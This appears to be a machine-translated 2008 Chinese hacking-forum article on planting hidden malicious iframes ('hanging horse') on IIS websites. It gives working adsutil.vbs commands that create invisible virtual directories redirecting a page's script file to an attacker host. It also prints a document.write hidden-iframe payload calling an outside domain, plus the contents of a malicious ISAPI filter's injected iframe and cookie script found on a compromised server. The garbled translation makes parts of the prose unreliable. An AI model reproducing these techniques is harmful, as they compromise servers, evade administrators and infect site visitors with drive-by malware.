A peculiar hang horse way-vulnerability warning-the black bar safety net

ID MYHACK58:62200817989
Type myhack58
Reporter 佚名
Modified 2008-01-02T00:00:00


I wrote this article is not to teach you how to run to hang horse Ah, hanging horse is not right! However, sometimes really want to do something make people feel happy things, because I came across a lot of administrators, you talk to him to convince the server has a problem! He does not believe, you change something warning him that he than you are diligent, you a change and he immediately covered it back, let a person really depressed. There are in some foreign machines, what permissions are got also don't know how he did it, what are not let to write, hard to write a file no one will change it back, really let a person very!#$%%#%^#%^, Supposedly there is a software can monitor important files, once found change the will to recover the past, such as he monitors the web directory while we cannot change his web site any of the content. However, see a lot of big shrimp article, own also slightly studied, finally figured something out, don't write any files you can achieve someone else's page altered and extended regular legend of the hanging horse, and so on consequences, here to tell you, those who only know hard working administrators have to be careful! As you know, we browse the website when they are is a server of the information processing into Html mode and then return to us, and we want to achieve is when the customer visits the time can change their browser's content, so he concealed the execution of our stuff, such as Trojans, and so on. The more common way is introduced into the Frame, set the property to let him in the pages is not visible, or not afraid dead of using javascript to jump, the comparison of high point will use the original code of the Html elements such as script tag or the frame tag, and then in these tags introduced in the other file or Page, the caterer, or change certain to be on the home page to display the database content, such as modifying a database in the Bulletin to achieve the hung it on. But these are required in the server of the original code is Riga something or modify the content of the website, whether it is across the station or directly modify the original code, This is extremely easy to find things, met a diligent administrator, your stuff is on the server stay long! There is if some page is not writable, we also very depressed, so it is necessary to find a more secluded and safer hung it to the way to solve the above problem! We first go to the Iis Manager to see it! Select a page to look at His attributes as shown in Figure one. Oh, there's a resource redirection! If we add to this page, select the redirect to we have control of a page so when the browser requests this page will turn and go to the access we defined that the page, if this page is a web page Trojan? Obviously, the visitor will be hung it is! This is a very simple way, only in the IIs change the page of the redirect can be! Any exposure to IIS Manager who can easily do it! But this is also a problem Ah! If the administrator found that the page always jump in to check site files and with a backup means of recovery still does not solve the problem, he will definitely go to IIS where to look! One not careful to see the main page of the property will be found where there is a problem then you can change back! So we continue to see that there is no more hidden method! By means of the previously hung it to the method, since the main page is very easy to be found, then go look at the home page in the Html tag! If you find it call other pages it is good to do! Such as inside a home where there is such a tag:

<script src=include/mm2. js></script>

Then we have the means, go to the Modify include/mms2. js attribute! As shown in Figure II, go to one of our pages, the content of course to be able to in the script tag in the explanation, such as:

document. write("<iframe style='display:none;' src=http://jnclovesw. com width=0 height=0></iframe>");

This can be the introduction of our page! Of course, the best to achieve his JS functions! That's enough take cover! Now administrators will find the home has not changed, go to IIs to see the home's attributes have not changed, even host any of the www documents are not modified, he will be very depressed! Huh! If he just put the previous site backup and recovery back is also no way to get the page changed back! IIs file so much he can't a property! Here by the way a problem is you choose to redirect the last file must be referenced in his html markup can explain, otherwise there is no effect! For example, a<img src=1. jpg>you put 1. jpg redirected to our Trojans page is of no use, because the Trojan page is not treated as Html parsing, but sent to the img tag as a picture! I think the energy use of the mark which is the script and frame, as for Css, I want to also be able to use, but using the method I have yet to find! Also don't know my analysis was right, and everyone is welcome to advise! Let's continue now! Suppose in case your administrator enough good or be good, he found you in the mm2. the js above to do the hands and feet, he will be from the IIs inside the his recovery the past! Our dreams and shattered! There is no more covert methods? Let the Administrators in IIs it can't find? The answer is Yes! Everyone must remember a long time ago that the IIS configuration vulnerabilities, you can create an invisible virtual directory, and then inside build a back door in! We can also borrow to take advantage of Oh! Look at the IIS configuration exploits the principle is that the establishment of a physical directory of a virtual directory, so it will be in IIs invisible, then you can be in this directory to do some little tricks! Here we first create an invisible virtual directory, if the home page in the call to the include folder under the js file, we build the include directory! This can be by means of IIS the script to achieve, wherein the adsutil. the vbs script is in the IIs install directory such as C:\Inetpub\AdminScripts under is Control IIS behavior of a script, we use the command as follows:

cscript adsutil. vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"

This will establish a IIs the invisible virtual directory, because there is no set path so it will not display! Then in this directory create a name called mm2. js virtual directory, huh! Actually the establishment of a virtual directory can be used to. Special characters like:

cscript adsutil. vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"

Thus there is a include/mm2. js virtual directory! What comes to mind? Is not with the home page call that file name has been, Oh! We continue to do!

cscript adsutil. vbs set W3SVC/1/Root/www/include/mm2. js/httpredirect "http://jnclovesw.com/mm1.j...

This is to change the mm2. js virtual directory redirection feature, as shown in Figure three. Note that one of the W3SVC/1/Root/www/representative IIs under the firstweb serverthe www virtual directory, everyone is unclear if you can use the adsutil. vbs enum parameter to the query yourself you need to change the website, other operations can open the adsutil. vbs script help! Such operation after you set up a virtual directory redirection feature, 现在试着在主页里调用include/mm2.js you guess the return is mm2. js the content or our mm1. js content? 答案 是 mm1.js as shown in Figure four, and the physical file is still there! This is perhaps the IIS properties! He first processes the user's request, and the virtual directory in preference to physical files! Then we went to IIS to see what there is does not have to include the virtual directory! As shown in Figure five, no! Huh! So, we successfully bypass the permission restrictions and administrator of the detection! Our Trojans hang on to each other on the site, and unless the other party to redo the IIs or remove our hidden virtual directory, otherwise he is very difficult to remove we are the Trojans!

The article is very simple, the key is the IIS script command and on IIs some understanding of this hanging horse way adapted to obtain administrator privileges after hung it against those who just diligent administrator is still very useful! We later found the site there is a problem remember to use this script to view The has not a problem! Or simply put the IIS settings back up! Encountered problems the IIs settings are also restored, huh!

  1. The whole server is hanging horse web pages in the source file but can not find the hanging horse code One server almost all Web sites to open web pages or even HTML pages are to appear.

<iframe src="http://xxxdfsfd/web.htm&qu... height=0 width=0></iframe>

This style of code is generally in the head portion of the antivirus will open the packet of poison

Open the HTML or ASP PHP page in the source code how to find this code

First suspect is JS looking for a half day or not found link a new HTML page will also have this piece of code to

Carefully look for the problem should be in IIS Open IIS restart once in the main on IIS, right click Properties the ISAPI find an ISAPI extension not seen

Path is: c:\windows\help\wanps.dll ISAP load the normal green state

Cancel restart IIS and all the code disappears

Load the item contains three files:

wanps. ini content is:

Cookie=GAG5=ABCDEFG Redirector=C:\windows\help\wanps.txt

wanps. txt content:

<body> <iframe src="http://xxx.com/web.htm&quo... height=0 width=0></iframe> <script language="javascript"> <!-- var expires = new Date(); expires. setTime(expires. getTime() + 5 * 2 4* 6 0 * 6 0 * 1 0 0 0); document. cookie="GAG5=ABCDEFG;expires="+expires. toGMTString(); --> </script> </body>